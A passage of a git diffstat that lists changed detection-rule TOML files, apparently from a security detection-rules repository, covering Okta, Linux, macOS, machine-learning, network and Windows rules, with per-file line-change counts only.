...tial_access_user_impersonation_access.toml | 26 ++-- ...tempt_to_deactivate_okta_network_zone.toml | 10 +- ...n_attempt_to_delete_okta_network_zone.toml | 10 +- ..._app_client_credential_token_exchange.toml | 32 +++-- ...kta_attempt_to_deactivate_okta_policy.toml | 16 +-- ...ttempt_to_deactivate_okta_policy_rule.toml | 10 +- ...on_okta_attempt_to_delete_okta_policy.toml | 20 +-- ...ta_attempt_to_delete_okta_policy_rule.toml | 16 +-- ...on_okta_attempt_to_modify_okta_policy.toml | 16 +-- ...ta_attempt_to_modify_okta_policy_rule.toml | 16 +-- ...ser_password_reset_or_unlock_attempts.toml | 37 +----- ...ttempt_to_deactivate_okta_application.toml | 27 ++-- ...ta_attempt_to_modify_okta_application.toml | 26 ++-- .../okta/impact_possible_okta_dos_attack.toml | 11 +- ...rrence_user_session_started_via_proxy.toml | 14 +- ...ta_user_attempted_unauthorized_access.toml | 29 +--- ...ss_sign_in_events_via_third_party_idp.toml | 44 +++++-- ...cation_sso_from_unknown_client_device.toml | 35 +++-- ...icious_activity_reported_by_okta_user.toml | 51 +------ ...ent_multiple_sessions_for_single_user.toml | 20 +-- ...eatinsight_threat_suspected_promotion.toml | 32 ++++- ...tor_privileges_assigned_to_okta_group.toml | 31 ++++- ...inistrator_role_assigned_to_okta_user.toml | 33 +++-- ...ence_attempt_to_create_okta_api_token.toml | 14 +- ...mfa_deactivation_with_no_reactivation.toml | 29 ++-- ..._or_delete_application_sign_on_policy.toml | 21 ++- ...login_to_okta_account_after_mfa_reset.toml | 38 +++--- ...unt_privileged_process_events_by_user.toml | 11 +- ..._process_command_line_entropy_by_user.toml | 28 ++-- ...l_linux_rare_process_executed_by_user.toml | 11 +- ..._high_sum_concurrent_sessions_by_user.toml | 33 ++--- ...access_ml_okta_rare_host_name_by_user.toml | 8 +- ...cess_ml_okta_rare_region_name_by_user.toml | 8 +- ...access_ml_okta_rare_source_ip_by_user.toml | 22 ++-- ..._group_application_assignment_changes.toml | 30 ++--- ...okta_spike_in_group_lifecycle_changes.toml | 33 
++--- ...kta_spike_in_group_membership_changes.toml | 33 ++--- ...okta_spike_in_group_privilege_changes.toml | 30 ++--- ..._in_user_lifecycle_management_changes.toml | 27 ++-- ...ws_high_count_group_management_events.toml | 35 +++-- ...ndows_high_count_special_logon_events.toml | 8 +- ...gh_count_special_privilege_use_events.toml | 13 +- ..._count_user_account_management_events.toml | 36 ++--- ...ss_ml_windows_rare_group_name_by_user.toml | 44 +++---- ...ndows_rare_privilege_assigned_to_user.toml | 8 +- ...s_ml_windows_rare_region_name_by_user.toml | 19 +-- ...se_evasion_ml_rare_process_for_a_host.toml | 15 +-- ..._ml_rare_process_for_a_parent_process.toml | 15 +-- ...se_evasion_ml_rare_process_for_a_user.toml | 32 +++-- ...icious_windows_event_high_probability.toml | 20 +-- ...picious_windows_event_low_probability.toml | 20 +-- ...ous_windows_process_cluster_from_host.toml | 15 +-- ...s_process_cluster_from_parent_process.toml | 15 +-- ...ous_windows_process_cluster_from_user.toml | 15 +-- ...and_control_aws_cli_endpoint_url_used.toml | 14 +- ...mand_and_control_cat_network_activity.toml | 30 ++--- ...and_control_cupsd_foomatic_rip_netcon.toml | 42 ++---- ...and_control_curl_socks_proxy_detected.toml | 8 +- ..._git_repo_or_file_download_to_sus_dir.toml | 8 +- ...nd_and_control_ip_forwarding_activity.toml | 13 +- ...ntrol_kubectl_networking_modification.toml | 12 +- ...mand_and_control_linux_kworker_netcon.toml | 43 +----- ...nd_control_linux_proxychains_activity.toml | 8 +- ..._and_control_linux_ssh_x11_forwarding.toml | 33 +++-- ...linux_suspicious_proxychains_activity.toml | 8 +- ...l_linux_tunneling_and_port_forwarding.toml | 7 +- ...ontrol_linux_tunneling_via_ssh_option.toml | 7 +- ...trol_potential_tunneling_command_line.toml | 7 +- ...mand_and_control_telegram_api_request.toml | 23 ++-- ...d_and_control_tunneling_via_earthworm.toml | 7 +- ...ial_access_collection_sensitive_files.toml | 37 +++--- ...ve_files_compression_inside_container.toml | 38 +++--- 
...ntial_access_gdb_init_process_hooking.toml | 7 +- ...credential_access_gdb_process_hooking.toml | 36 +++-- .../credential_access_gh_auth_via_nodejs.toml | 32 +---- ...ernetes_service_account_secret_access.toml | 40 ++---- ...edential_access_manual_memory_dumping.toml | 7 +- ...tential_linux_ssh_bruteforce_external.toml | 7 +- ...tential_linux_ssh_bruteforce_internal.toml | 7 +- ...ss_potential_password_spraying_attack.toml | 7 +- ...ntial_successful_linux_ssh_bruteforce.toml | 7 +- ...ential_access_proc_credential_dumping.toml | 7 +- ..._or_passwords_search_inside_container.toml | 24 ++-- ...cess_ssh_password_grabbing_via_strace.toml | 31 +---- ...nse_evasion_apparmor_policy_violation.toml | 7 +- ...ion_attempt_to_disable_auditd_service.toml | 8 +- ...tempt_to_disable_iptables_or_firewall.toml | 8 +- ...ion_attempt_to_disable_syslog_service.toml | 7 +- ...evasion_authorized_keys_file_deletion.toml | 28 ++-- ...ense_evasion_base64_decoding_activity.toml | 35 +---- ...binary_copied_to_suspicious_directory.toml | 7 +- ...defense_evasion_bpf_program_tampering.toml | 7 +- ...ense_evasion_clear_kernel_ring_buffer.toml | 12 +- ...sion_curl_or_wget_executed_via_lolbin.toml | 67 +++------- ...nse_evasion_directory_creation_in_bin.toml | 23 +--- ...fense_evasion_disable_selinux_attempt.toml | 7 +- ...doas_configuration_creation_or_rename.toml | 31 +++-- ...defense_evasion_file_mod_writable_dir.toml | 8 +- ...hex_payload_execution_via_commandline.toml | 52 +------- ...ion_hex_payload_execution_via_utility.toml | 22 +--- ...nse_evasion_hidden_directory_creation.toml | 22 +--- .../defense_evasion_hidden_file_dir_tmp.toml | 10 +- ...on_interactive_shell_from_system_user.toml | 32 ++--- ...rpreter_launched_from_decoded_payload.toml | 59 ++++----- ...defense_evasion_journalctl_clear_logs.toml | 12 +- ...defense_evasion_kernel_module_removal.toml | 20 +-- ...defense_evasion_kill_command_executed.toml | 45 ++----- ...defense_evasion_kthreadd_masquerading.toml | 13 +- 
.../defense_evasion_ld_preload_cmdline.toml | 74 ++--------- .../linux/defense_evasion_ld_so_creation.toml | 46 +------ ...evasion_multi_base64_decoding_attempt.toml | 61 ++------- ...asion_potential_kubectl_impersonation.toml | 40 ++---- ...vasion_potential_kubectl_masquerading.toml | 7 +- ...ense_evasion_potential_proot_exploits.toml | 33 ++--- ..._evasion_prctl_process_name_tampering.toml | 8 +- .../defense_evasion_rename_esxi_files.toml | 34 +++-- ...ense_evasion_ssl_certificate_deletion.toml | 12 +- ...s_utility_executed_via_tmux_or_screen.toml | 8 +- ...fense_evasion_suspicious_path_mounted.toml | 7 +- ...vasion_symlink_binary_to_writable_dir.toml | 32 ++--- ...vasion_sysctl_kernel_feature_activity.toml | 22 +--- ...ense_evasion_unusual_preload_env_vars.toml | 31 +---- ...efense_evasion_user_or_group_deletion.toml | 22 ++-- ...r_log_file_creation_by_unsual_process.toml | 47 +------ .../discovery_dynamic_linker_via_od.toml | 8 +- .../discovery_esxi_software_via_find.toml | 7 +- .../discovery_esxi_software_via_grep.toml | 8 +- ...ion_discovery_via_kprobes_and_tracefs.toml | 35 +---- .../discovery_kernel_module_enumeration.toml | 9 +- rules/linux/discovery_kernel_seeking.toml | 30 +---- rules/linux/discovery_kernel_unpacking.toml | 30 +---- .../discovery_kubeconfig_file_discovery.toml | 38 +++--- ...iscovery_kubectl_permission_discovery.toml | 8 +- .../linux/discovery_linux_hping_activity.toml | 11 +- .../linux/discovery_linux_nping_activity.toml | 10 +- ..._mount_discovery_via_exports_or_fstab.toml | 8 +- .../discovery_pam_version_discovery.toml | 48 +------ .../linux/discovery_ping_sweep_detected.toml | 8 +- .../discovery_polkit_version_discovery.toml | 8 +- ...ivate_key_password_searching_activity.toml | 29 ++-- rules/linux/discovery_proc_maps_read.toml | 34 +---- .../linux/discovery_process_capabilities.toml | 8 +- ...curity_file_access_via_common_utility.toml | 37 ++++-- ...very_sudo_allowed_command_enumeration.toml | 11 +- 
.../discovery_suid_sguid_enumeration.toml | 38 +----- ...etwork_tool_launched_inside_container.toml | 50 ++----- ...ry_suspicious_which_command_execution.toml | 11 +- ...overy_unusual_user_enumeration_via_id.toml | 23 +++- ...covery_virtual_machine_fingerprinting.toml | 43 +++--- .../discovery_yum_dnf_plugin_detection.toml | 13 +- ...tion_abnormal_process_id_file_created.toml | 31 ++--- ...tion_cupsd_foomatic_rip_file_creation.toml | 12 +- ..._cupsd_foomatic_rip_lp_user_execution.toml | 40 +++--- ...on_cupsd_foomatic_rip_shell_execution.toml | 14 +- ...omatic_rip_suspicious_child_execution.toml | 40 +++--- ...nnection_from_entrypoint_in_container.toml | 38 +++--- .../execution_executable_stack_execution.toml | 19 +-- ...n_file_execution_followed_by_deletion.toml | 42 ++++-- ...executable_via_chmod_inside_container.toml | 25 +--- ...er_or_listener_established_via_netcat.toml | 46 +++++-- .../execution_kubectl_apply_pod_from_url.toml | 12 +- ...s_direct_api_request_via_curl_or_wget.toml | 37 ++---- .../execution_nc_listener_via_rlwrap.toml | 31 ++--- ...ion_netcon_from_rwx_mem_region_binary.toml | 41 ++---- ...cution_network_event_post_compilation.toml | 45 +++---- rules/linux/execution_perl_tty_shell.toml | 7 +- ...xecution_potential_hack_tool_executed.toml | 99 +++++++++++--- ..._overly_permissive_container_creation.toml | 25 +--- ...rocess_backgrounded_by_unusual_parent.toml | 50 ++++--- ..._process_started_from_process_id_file.toml | 33 ++--- ...ss_started_in_shared_memory_directory.toml | 32 +++-- rules/linux/execution_python_tty_shell.toml | 7 +- .../execution_python_webserver_spawned.toml | 15 +-- .../execution_shell_evasion_linux_binary.toml | 30 +++-- ...cution_shell_openssl_client_or_server.toml | 38 ++---- ...xecution_shell_via_background_process.toml | 40 +++--- ...ion_shell_via_child_tcp_utility_linux.toml | 37 +++--- ...ecution_shell_via_java_revshell_linux.toml | 15 +-- ...on_shell_via_lolbin_interpreter_linux.toml | 47 +++---- 
...execution_shell_via_meterpreter_linux.toml | 50 +++---- ...execution_shell_via_suspicious_binary.toml | 37 +++--- ...ution_shell_via_tcp_cli_utility_linux.toml | 37 +++--- ...ution_shell_via_udp_cli_utility_linux.toml | 37 +++--- ...traction_or_decrompression_via_funzip.toml | 37 +----- ...us_executable_running_system_commands.toml | 53 +++++--- ...icious_mining_process_creation_events.toml | 45 ++++--- ...execution_suspicious_mkfifo_execution.toml | 37 ++---- ..._container_creation_command_execution.toml | 32 +---- ..._system_binary_file_permission_change.toml | 28 ++-- rules/linux/execution_tc_bpf_filter.toml | 34 ++--- ...nknown_rwx_mem_region_binary_executed.toml | 14 +- .../execution_unusual_kthreadd_execution.toml | 48 +++---- ...ual_path_invocation_from_command_line.toml | 38 ++---- .../execution_unusual_pkexec_execution.toml | 40 ++---- ...tion_potential_curl_data_exfiltration.toml | 23 ++-- ...ntial_data_splitting_for_exfiltration.toml | 7 +- ...filtration_potential_database_dumping.toml | 29 ++-- ...tion_potential_wget_data_exfiltration.toml | 18 +-- ...nusual_file_transfer_utility_launched.toml | 25 +--- .../impact_memory_swap_modification.toml | 33 +---- ...otential_bruteforce_malware_infection.toml | 56 ++------ ..._first_time_public_key_authentication.toml | 34 +++-- ...sful_ssh_authentication_by_unusual_ip.toml | 34 +++-- ...ul_ssh_authentication_by_unusual_user.toml | 34 +++-- ...ess_telnet_auth_bypass_via_user_envar.toml | 31 +---- ...ral_movement_kubeconfig_file_activity.toml | 57 ++------ ...lateral_movement_ssh_it_worm_download.toml | 42 ++---- ...ment_telnet_network_activity_external.toml | 24 ++-- ...istence_apt_package_manager_execution.toml | 59 +++------ ...nce_apt_package_manager_file_creation.toml | 30 +---- ...ersistence_apt_package_manager_netcon.toml | 53 +++----- rules/linux/persistence_at_job_creation.toml | 20 +-- rules/linux/persistence_boot_file_copy.toml | 53 ++------ .../persistence_bpf_probe_write_user.toml | 28 +--- 
.../persistence_bpf_program_or_map_load.toml | 35 +---- .../persistence_chkconfig_service_add.toml | 7 +- ...credential_access_modify_ssh_binaries.toml | 54 ++------ .../linux/persistence_cron_job_creation.toml | 43 ++---- .../persistence_dbus_service_creation.toml | 14 +- ...e_dbus_unsual_daemon_parent_execution.toml | 52 +------- ..._package_manager_plugin_file_creation.toml | 37 +----- ...kage_installation_from_unusual_parent.toml | 40 ++---- .../persistence_dpkg_unusual_execution.toml | 39 ++---- .../persistence_dracut_module_creation.toml | 51 +------ .../persistence_dynamic_linker_backup.toml | 31 +++-- ...ersistence_extract_initramfs_via_cpio.toml | 12 +- .../linux/persistence_git_hook_execution.toml | 44 ++----- .../persistence_git_hook_file_creation.toml | 52 +------- rules/linux/persistence_git_hook_netcon.toml | 41 +++--- ...ersistence_git_hook_process_execution.toml | 45 ++----- ...rsistence_grub_configuration_creation.toml | 25 +--- rules/linux/persistence_grub_makeconfig.toml | 12 +- .../persistence_init_d_file_creation.toml | 7 +- ...persistence_insmod_kernel_module_load.toml | 28 ++-- ...ersistence_kde_autostart_modification.toml | 7 +- .../linux/persistence_kernel_driver_load.toml | 32 ++--- ...stence_kernel_driver_load_by_non_root.toml | 28 ++-- ...nel_module_load_from_unusual_location.toml | 28 ++-- ...rsistence_kernel_object_file_creation.toml | 30 ++--- ...ce_kubernetes_sensitive_file_activity.toml | 12 +- .../persistence_kworker_file_creation.toml | 38 ++---- ...sistence_linux_backdoor_user_creation.toml | 39 +++--- .../persistence_linux_group_creation.toml | 40 ++++-- ...e_linux_shell_activity_via_web_server.toml | 28 ++-- ..._linux_user_added_to_privileged_group.toml | 45 ++++--- ...tence_lkm_configuration_file_creation.toml | 25 +--- .../persistence_manual_dracut_execution.toml | 33 +---- ...rsistence_message_of_the_day_creation.toml | 7 +- ...sistence_message_of_the_day_execution.toml | 7 +- ...etwork_manager_dispatcher_persistence.toml | 
52 +------- ...stence_openssl_passwd_hash_generation.toml | 7 +- ...ggable_authentication_module_creation.toml | 30 +++-- ...cation_module_creation_in_unusual_dir.toml | 30 +++-- ...ication_module_pam_exec_backdoor_exec.toml | 36 ++--- ...authentication_module_source_download.toml | 39 ++---- .../persistence_polkit_policy_creation.toml | 33 +---- ...persistence_script_executable_bit_set.toml | 12 +- ...nce_process_capability_set_via_setcap.toml | 25 +--- .../linux/persistence_pth_file_creation.toml | 44 +------ ...kage_installation_from_unusual_parent.toml | 32 +---- ...sistence_setuid_setgid_capability_set.toml | 22 +--- .../persistence_shared_object_creation.toml | 47 +++++-- ...simple_web_server_connection_accepted.toml | 71 ++++------ ...ersistence_simple_web_server_creation.toml | 52 +------- ...site_and_user_customize_file_creation.toml | 44 +------ .../linux/persistence_ssh_key_generation.toml | 47 +------ rules/linux/persistence_ssh_netcon.toml | 38 +----- ...stence_ssh_via_backdoored_system_user.toml | 51 +++---- ...suspicious_file_opened_through_editor.toml | 68 +++++++++- ...e_suspicious_ssh_execution_xzbackdoor.toml | 51 ++----- ...ersistence_systemd_generator_creation.toml | 41 +----- rules/linux/persistence_systemd_netcon.toml | 65 ++++----- .../persistence_systemd_service_started.toml | 37 ++---- .../persistence_systemd_shell_execution.toml | 36 ++--- ...ersistence_tainted_kernel_module_load.toml | 28 ++-- ...ainted_kernel_module_out_of_tree_load.toml | 24 +--- .../linux/persistence_udev_rule_creation.toml | 12 +- ...ce_unpack_initramfs_via_unmkinitramfs.toml | 38 +----- ...rsistence_unusual_exim4_child_process.toml | 38 +++--- .../persistence_unusual_pam_grantor.toml | 41 +++--- ...ersistence_unusual_sshd_child_process.toml | 52 ++------ ...ser_or_group_creation_or_modification.toml | 12 +- ...sistence_web_server_sus_child_spawned.toml | 48 ++----- ...ence_web_server_sus_command_execution.toml | 44 +------ 
...tence_web_server_sus_destination_port.toml | 57 +------- ..._web_server_unusual_command_execution.toml | 48 ++----- ..._package_manager_plugin_file_creation.toml | 35 +---- ...on_chown_chmod_unauthorized_file_read.toml | 47 ++----- ...cve_2025_32463_nsswitch_file_creation.toml | 7 +- ..._cve_2025_32463_sudo_chroot_execution.toml | 12 +- .../privilege_escalation_dac_permissions.toml | 46 +++++-- ...calation_enlightenment_window_manager.toml | 13 +- ...e_escalation_gdb_sys_ptrace_elevation.toml | 12 +- ...lege_escalation_gdb_sys_ptrace_netcon.toml | 52 +------- ...lege_escalation_kworker_uid_elevation.toml | 40 +++--- ...lation_ld_preload_shared_object_modif.toml | 31 +++-- ...lation_linux_suspicious_symbolic_link.toml | 41 ++---- ...n_load_and_unload_of_kernel_via_kexec.toml | 53 +------- ...vilege_escalation_pkexec_envar_hijack.toml | 26 ++-- ...ation_potential_bufferoverflow_attack.toml | 26 ++-- ...tion_potential_suid_sgid_exploitation.toml | 25 +--- ...n_potential_suid_sgid_proxy_execution.toml | 39 +----- ...lation_potential_wildcard_shell_spawn.toml | 32 +---- ...ge_escalation_sda_disk_mount_non_root.toml | 28 ++-- ...privilege_escalation_shadow_file_read.toml | 26 +--- ...vilege_escalation_sudo_cve_2019_14287.toml | 13 +- .../privilege_escalation_sudo_hijacking.toml | 28 ++-- ...uspicious_cap_setuid_python_execution.toml | 7 +- ...ion_suspicious_chown_fowner_elevation.toml | 37 ++++-- ...calation_suspicious_passwd_file_write.toml | 37 ++++-- ...alation_suspicious_uid_guid_elevation.toml | 7 +- ...uid_elevation_from_unknown_executable.toml | 38 ++---- ...lation_unshare_namespace_manipulation.toml | 8 +- ...ery_output_written_to_suspicious_file.toml | 54 ++++---- ...e_file_access_followed_by_compression.toml | 48 +++---- ..._control_aws_s3_connection_via_script.toml | 51 ++++--- ..._control_executable_download_via_wget.toml | 36 ++--- ...control_google_calendar_c2_via_script.toml | 59 ++------- ...rol_network_connection_to_oast_domain.toml | 43 +++--- 
...trol_perl_outbound_network_connection.toml | 46 ++----- ..._and_control_potential_etherhiding_c2.toml | 64 ++------- ..._suspicious_curl_to_google_app_script.toml | 34 ++--- ...ection_to_suspicious_top_level_domain.toml | 8 +- ..._connection_to_suspicious_web_service.toml | 8 +- ...dential_access_high_volume_of_pbpaste.toml | 27 ++-- .../credential_access_kerberosdump_kcc.toml | 16 +-- ...s_keychain_pwd_retrieval_security_cmd.toml | 17 +-- ...ential_access_mitm_localhost_webproxy.toml | 11 +- ...al_access_promt_for_pwd_via_osascript.toml | 32 +++-- ...ensitive_file_access_first_occurrence.toml | 25 +++- ...vasion_apple_softupdates_modification.toml | 10 +- ...evasion_attempt_del_quarantine_attrib.toml | 19 ++- ...evasion_attempt_to_disable_gatekeeper.toml | 8 +- ...ion_gatekeeper_override_and_execution.toml | 36 ++--- ..._evasion_modify_environment_launchctl.toml | 30 ++--- ...cy_controls_tcc_database_modification.toml | 44 ++++--- ...tion_privacy_pref_sshd_fulldiskaccess.toml | 39 +++--- .../defense_evasion_safari_config_change.toml | 16 +-- ...dboxed_office_app_suspicious_zip_file.toml | 11 +- ...evasion_suspicious_tcc_access_granted.toml | 70 +++++----- ..._evasion_unload_endpointsecurity_kext.toml | 24 +--- .../discovery_full_disk_access_check.toml | 36 ++--- .../macos/discovery_suspicious_sip_check.toml | 48 ++++--- ...ystem_and_network_configuration_check.toml | 23 ++-- ...covery_users_domain_built_in_commands.toml | 15 ++- ...vasion_electron_app_childproc_node_js.toml | 30 +---- ...l_access_suspicious_browser_childproc.toml | 13 +- ...staller_package_spawned_network_event.toml | 46 +++---- ...n_python_shell_spawn_first_occurrence.toml | 10 +- ...cution_script_via_automator_workflows.toml | 8 +- ...ing_osascript_exec_followed_by_netcon.toml | 32 ++--- ...n_shell_execution_via_apple_scripting.toml | 18 ++- ...ution_unusual_library_load_via_python.toml | 23 ++-- ...uspicious_mac_ms_office_child_process.toml | 55 +++++--- 
...ential_access_kerberos_bifrostconsole.toml | 38 +++--- ...ral_movement_remote_ssh_login_enabled.toml | 31 ++--- ...ment_suspicious_curl_to_jamf_endpoint.toml | 41 ++---- ...teral_movement_vpn_connection_attempt.toml | 26 ++-- ...stence_account_creation_hide_at_logon.toml | 39 +++--- ...sistence_apple_mail_rule_modification.toml | 31 ++--- ...ce_creation_change_launch_agents_file.toml | 13 +- ..._creation_hidden_login_item_osascript.toml | 47 +------ ..._access_authorization_plugin_creation.toml | 34 ++--- ...ence_curl_execution_via_shell_profile.toml | 44 +++---- ...launch_agent_deamon_logonitem_process.toml | 43 +++--- ...e_docker_shortcuts_plist_modification.toml | 14 +- .../persistence_enable_root_account.toml | 36 ++--- ...n_hidden_launch_agent_deamon_creation.toml | 38 +++--- ...sistence_finder_sync_plugin_pluginkit.toml | 11 +- ...istence_folder_action_scripts_runtime.toml | 33 +---- .../persistence_hidden_plist_filename.toml | 69 +++++----- ...rsistence_login_logout_hooks_defaults.toml | 8 +- ...stence_loginwindow_plist_modification.toml | 26 ++-- ...nce_manual_chromium_extension_loading.toml | 44 ++----- ...ersistence_periodic_tasks_file_mdofiy.toml | 10 +- ...t_or_daemon_creation_first_occurrence.toml | 10 +- ...e_screensaver_plist_file_modification.toml | 8 +- ...rsistence_startup_item_plist_creation.toml | 53 +++++--- ...tence_via_atom_init_file_modification.toml | 11 +- ...calation_applescript_with_admin_privs.toml | 34 +++-- ...calation_explicit_creds_via_scripting.toml | 33 ++--- ..._escalation_local_user_added_to_admin.toml | 42 +++--- ...ilege_escalation_root_crontab_filemod.toml | 30 +++-- ..._escalation_user_added_to_admin_group.toml | 42 +++--- ...d_control_ml_packetbeat_dns_tunneling.toml | 15 ++- ...d_and_control_ml_packetbeat_rare_urls.toml | 44 +++++-- ...control_ml_packetbeat_rare_user_agent.toml | 26 ++-- ..._access_ml_auth_spike_in_logon_events.toml | 8 +- ...pike_in_logon_events_from_a_source_ip.toml | 37 ++---- 
...execution_ml_windows_anomalous_script.toml | 35 +++-- ...nitial_access_ml_auth_rare_user_logon.toml | 35 +++-- ...windows_rare_user_type10_remote_login.toml | 31 +++-- .../ml_high_count_events_for_a_host_name.toml | 58 +------- rules/ml/ml_high_count_network_denies.toml | 66 +++------- rules/ml/ml_high_count_network_events.toml | 54 +------- .../ml_linux_anomalous_network_activity.toml | 60 +-------- ...linux_anomalous_network_port_activity.toml | 44 +------ .../ml_low_count_events_for_a_host_name.toml | 27 +--- .../ml/ml_packetbeat_rare_server_domain.toml | 58 ++------ rules/ml/ml_rare_destination_country.toml | 60 ++------- .../ml/ml_spike_in_traffic_to_a_country.toml | 48 +++---- ...ml_windows_anomalous_network_activity.toml | 53 ++------ ..._ml_linux_anomalous_process_all_hosts.toml | 20 +-- ...istence_ml_rare_process_by_host_linux.toml | 30 +++-- ...tence_ml_rare_process_by_host_windows.toml | 20 +-- ...ce_ml_windows_anomalous_path_activity.toml | 33 +---- ...l_windows_anomalous_process_all_hosts.toml | 32 +---- ...ml_windows_anomalous_process_creation.toml | 35 ++--- ...tion_ml_linux_anomalous_sudo_activity.toml | 18 +-- ...tion_ml_windows_rare_user_runas_event.toml | 18 ++- ..._ml_linux_anomalous_compiler_activity.toml | 20 +-- ...cepted_default_telnet_port_connection.toml | 42 ++---- ...mand_and_control_cobalt_strike_beacon.toml | 12 +- ...cobalt_strike_default_teamserver_cert.toml | 13 +- .../command_and_control_fin7_c2_behavior.toml | 12 +- .../command_and_control_halfbaked_beacon.toml | 16 +-- ...d_control_nat_traversal_port_activity.toml | 8 +- .../command_and_control_port_26_activity.toml | 30 +++-- ...te_desktop_protocol_from_the_internet.toml | 30 +---- ...l_network_computing_from_the_internet.toml | 34 ++--- ...ual_network_computing_to_the_internet.toml | 8 +- ...very_potential_network_sweep_detected.toml | 30 +---- ...iscovery_potential_port_scan_detected.toml | 29 +--- ...very_potential_syn_port_scan_detected.toml | 8 +- 
...rtigate_sso_login_from_unusual_source.toml | 10 +- ...s_react_server_components_rce_attempt.toml | 28 ++-- ...ccess_react_server_rce_network_alerts.toml | 37 +----- ...mote_procedure_call_from_the_internet.toml | 11 +- ...remote_procedure_call_to_the_internet.toml | 30 +++-- ...file_sharing_activity_to_the_internet.toml | 18 +-- ...al_access_unsecure_elasticsearch_node.toml | 19 ++- ..._access_endgame_cred_dumping_detected.toml | 10 +- .../endgame_ransomware_detected.toml | 16 ++- .../endgame_ransomware_prevented.toml | 16 ++- .../execution_endgame_exploit_detected.toml | 28 +--- .../execution_endgame_exploit_prevented.toml | 11 +- ...on_endgame_cred_manipulation_detected.toml | 18 ++- ...n_endgame_cred_manipulation_prevented.toml | 18 ++- ...ion_endgame_permission_theft_detected.toml | 28 +++- ...on_endgame_permission_theft_prevented.toml | 28 +++- ...on_endgame_process_injection_detected.toml | 18 ++- ...n_endgame_process_injection_prevented.toml | 18 ++- .../threat_intel_indicator_match_email.toml | 17 ++- ...lection_email_outlook_mailbox_via_com.toml | 21 +-- ...ion_email_powershell_exchange_mailbox.toml | 43 +----- .../collection_mailbox_export_winlog.toml | 13 +- .../collection_posh_audio_capture.toml | 24 +--- .../collection_posh_clipboard_capture.toml | 22 +--- rules/windows/collection_posh_keylogger.toml | 44 ++++--- rules/windows/collection_posh_mailbox.toml | 24 +--- .../collection_posh_screen_grabber.toml | 22 +--- .../collection_posh_webcam_video_capture.toml | 19 +-- .../windows/collection_winrar_encryption.toml | 8 +- .../command_and_control_certreq_postdata.toml | 35 +---- ...ommand_and_control_common_webservices.toml | 45 +------ ...control_encrypted_channel_freesslcert.toml | 8 +- .../command_and_control_iexplore_via_com.toml | 45 +++++-- ...command_and_control_outlook_home_page.toml | 27 +--- ...ontrol_port_forwarding_added_registry.toml | 41 ++---- .../command_and_control_rdp_tunnel_plink.toml | 16 +-- 
.../command_and_control_remcos_rat_iocs.toml | 35 ++--- ...ol_remote_file_copy_desktopimgdownldr.toml | 31 +++-- ...d_control_remote_file_copy_powershell.toml | 12 +- ..._and_control_remote_file_copy_scripts.toml | 13 +- ...d_and_control_screenconnect_childproc.toml | 31 +++-- ...control_sunburst_c2_activity_detected.toml | 24 +--- ...d_control_teamviewer_remote_file_copy.toml | 8 +- ...nd_and_control_tool_transfer_via_curl.toml | 15 ++- .../command_and_control_tunnel_yuze.toml | 8 +- ..._control_velociraptor_shell_execution.toml | 46 ++++--- .../credential_access_adidns_wildcard.toml | 27 ++-- ...ential_access_browsers_unusual_parent.toml | 33 ++--- ...ntial_access_bruteforce_admin_account.toml | 10 +- ...rce_multiple_logon_failure_same_srcip.toml | 10 +- .../credential_access_cmdline_dump_tool.toml | 39 +----- ...ial_access_dcsync_newterm_subjectuser.toml | 36 +---- ...tial_access_dcsync_replication_rights.toml | 36 +---- ...redential_access_dcsync_user_backdoor.toml | 42 +++--- ...ntial_access_disable_kerberos_preauth.toml | 49 +------ .../credential_access_dnsnode_creation.toml | 27 ++-- ...redential_access_dollar_account_relay.toml | 13 +- ..._access_dollar_account_relay_kerberos.toml | 10 +- ...cess_domain_backup_dpapi_private_keys.toml | 12 +- .../credential_access_generic_localdumps.toml | 22 +--- ..._access_iis_connectionstrings_dumping.toml | 14 +- .../credential_access_kerberos_coerce.toml | 16 +-- ...credential_access_kerberos_coerce_dns.toml | 13 +- .../windows/credential_access_kirbi_file.toml | 8 +- .../credential_access_ldap_attributes.toml | 39 +----- ...edential_access_lsass_loaded_susp_dll.toml | 35 ++--- ...edential_access_lsass_openprocess_api.toml | 30 +---- ...tial_access_machine_account_smb_relay.toml | 10 +- ...l_access_mimikatz_memssp_default_logs.toml | 41 +++--- ...ial_access_mimikatz_powershell_module.toml | 10 +- ..._access_mod_wdigest_security_provider.toml | 39 +++--- ...l_access_moving_registry_hive_via_smb.toml | 37 ++---- 
...e_network_logon_provider_modification.toml | 20 ++- ...edential_access_posh_invoke_ninjacopy.toml | 47 +++---- ...edential_access_posh_kerb_ticket_dump.toml | 26 +--- .../credential_access_posh_minidump.toml | 22 +--- .../credential_access_posh_relay_tools.toml | 28 ++-- ...credential_access_posh_request_ticket.toml | 25 +--- .../credential_access_posh_veeam_sql.toml | 26 +--- ...cess_relay_ntlm_auth_via_http_spoolss.toml | 44 +------ ...dential_access_remote_sam_secretsdump.toml | 29 +--- ...ntial_access_saved_creds_vault_winlog.toml | 10 +- ...redential_access_saved_creds_vaultcmd.toml | 10 +- ...edelegationprivilege_assigned_to_user.toml | 38 ++---- .../credential_access_shadow_credentials.toml | 39 +++--- ...dential_access_spn_attribute_modified.toml | 33 ++--- ...ccess_suspicious_lsass_access_memdump.toml | 19 +-- ...cious_winreg_access_via_sebackup_priv.toml | 36 +---- ..._symbolic_link_to_shadow_copy_created.toml | 41 +++--- ...ial_access_veeam_backup_dll_imageload.toml | 25 +--- .../credential_access_veeam_commands.toml | 41 +----- .../credential_access_wbadmin_ntds.toml | 22 +--- ...dential_access_web_config_file_access.toml | 35 +++-- ...dential_access_wireless_creds_dumping.toml | 36 +---- ...den_file_attribute_with_via_attribexe.toml | 38 +----- ...efense_evasion_amsi_bypass_powershell.toml | 24 +--- ..._evasion_audit_policy_disabled_winlog.toml | 20 +-- ...sion_clearing_windows_console_history.toml | 40 +----- ...e_evasion_clearing_windows_event_logs.toml | 12 +- ..._signing_policy_modification_registry.toml | 10 +- ...ication_apps_suspicious_child_process.toml | 42 ++---- ...vasion_defender_disabled_via_registry.toml | 12 +- ...ion_defender_exclusion_via_powershell.toml | 29 +--- ...efense_evasion_disabling_windows_logs.toml | 20 +-- ...vasion_dotnet_compiler_parent_process.toml | 40 +----- ...ecution_control_panel_suspicious_args.toml | 23 +--- ...ense_evasion_execution_lolbas_wuauclt.toml | 21 +-- ...ecution_msbuild_started_by_office_app.toml | 
